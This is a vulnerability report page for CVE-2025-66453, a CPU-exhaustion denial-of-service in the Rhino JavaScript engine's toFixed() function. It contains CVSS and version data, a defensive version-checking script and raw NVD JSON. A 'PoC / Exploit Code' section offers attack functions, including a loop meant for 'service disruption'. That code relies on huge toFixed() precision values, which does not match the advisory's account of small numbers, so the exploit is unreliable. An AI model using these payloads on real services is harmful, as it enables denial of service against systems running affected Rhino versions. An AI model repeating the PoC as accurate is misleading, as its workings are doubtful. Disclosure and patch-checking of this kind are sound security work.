Security Vulnerability Report
CVE-2025-66453 CVSS 7.5 HIGH

CVE-2025-66453

Published: 2025-12-03 20:16:27
Last Modified: 2026-04-14 15:39:20

Description

Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker-controlled floating-point number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult, where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:rhino:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:rhino:1.7.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:rhino:1.8.0:*:*:*:*:*:*:* - VULNERABLE
Rhino < 1.7.14.1
Rhino < 1.7.15.1
Rhino < 1.8.1
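
The list above combines one version range with two exact matches, so a plain "less than 1.8.1" comparison over-reports. The added example below (not code from Rhino or from this database) applies the page's three CPE criteria to version strings; the function names and the sample inventory are constructed for illustration.

```javascript
// Added example: classify a Rhino version against the CPE criteria on this
// page for CVE-2025-66453. All names here are hypothetical, not Rhino APIs.

// Parse "1.7.15" or "1.7.14.1" into four integers; missing parts count as 0.
function parseVersion(text) {
  const m = /^(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?$/.exec(String(text).trim());
  if (!m) return null; // qualifiers such as "-SNAPSHOT" need manual review
  return m.slice(1).map((p) => (p === undefined ? 0 : parseInt(p, 10)));
}

// Component-wise comparison: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Criteria as listed on the page: everything below 1.7.14.1,
// plus exactly 1.7.15 and exactly 1.8.0.
const END_EXCLUDING = parseVersion("1.7.14.1");
const EXACT_MATCHES = ["1.7.15", "1.8.0"].map(parseVersion);

function rhinoStatus(versionText) {
  const v = parseVersion(versionText);
  if (v === null) return "unknown";
  if (compareVersions(v, END_EXCLUDING) < 0) return "vulnerable";
  if (EXACT_MATCHES.some((e) => compareVersions(v, e) === 0)) return "vulnerable";
  return "not listed";
}

// Constructed sample inventory of dependency versions.
const inventory = ["1.7.13", "1.7.14", "1.7.14.1", "1.7.15",
                   "1.7.15.1", "1.8.0", "1.8.1", "1.7.15-SNAPSHOT"];
for (const v of inventory) {
  console.log(v.padEnd(16), rhinoStatus(v));
}
```

A result of "unknown" means the string did not parse as a plain dotted version and should be checked by hand rather than treated as safe.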

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-66453 PoC - Rhino toFixed() DoS Vulnerability
// Affects: Rhino < 1.7.14.1, < 1.7.15.1, < 1.8.1

// Example 1: Basic PoC
function triggerDoS() {
  var maliciousNumber = 0.123456;
  // Pass extremely large value to toFixed() to trigger pow5mult with huge exponent
  var result = maliciousNumber.toFixed(1000000);
  return result;
}

// Example 2: Simulate attacker-controlled input scenario
function simulateAttack(userInput) {
  var floatValue = parseFloat(userInput);
  if (!isNaN(floatValue)) {
    // Attacker can control the precision parameter
    var precision = parseInt(userInput.split('.')[1]) || 0;
    // Trigger vulnerability with large precision value
    return floatValue.toFixed(precision * 10000);
  }
}

// Example 3: Batch trigger for service disruption
function massAttack() {
  for (var i = 0; i < 1000; i++) {
    try {
      (0.1).toFixed(999999);
    } catch (e) {
      // Handle potential errors but continue attack
    }
  }
}

// Execute PoC
try {
  triggerDoS();
  console.log('DoS triggered successfully');
} catch (e) {
  console.log('Error: ' + e.message);
}

References

https://github.com/mozilla/rhino/security/advisories/GHSA-3w8q-xq97-5j7x (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66453", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.897", "lastModified": "2026-04-14T15:39:20.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker controlled float poing number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.14.1", "matchCriteriaId": "061BECFF-1251-4087-9BF8-CA70D17D9AAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:1.7.15:*:*:*:*:*:*:*", "matchCriteriaId": "560BC060-5CBA-4BF4-8169-9F23D27BF729"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C5E0825A-E0C9-48D8-800C-888160052EFF"}]}]}], "references": [{"url": "https://github.com/mozilla/rhino/security/advisories/GHSA-3w8q-xq97-5j7x", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}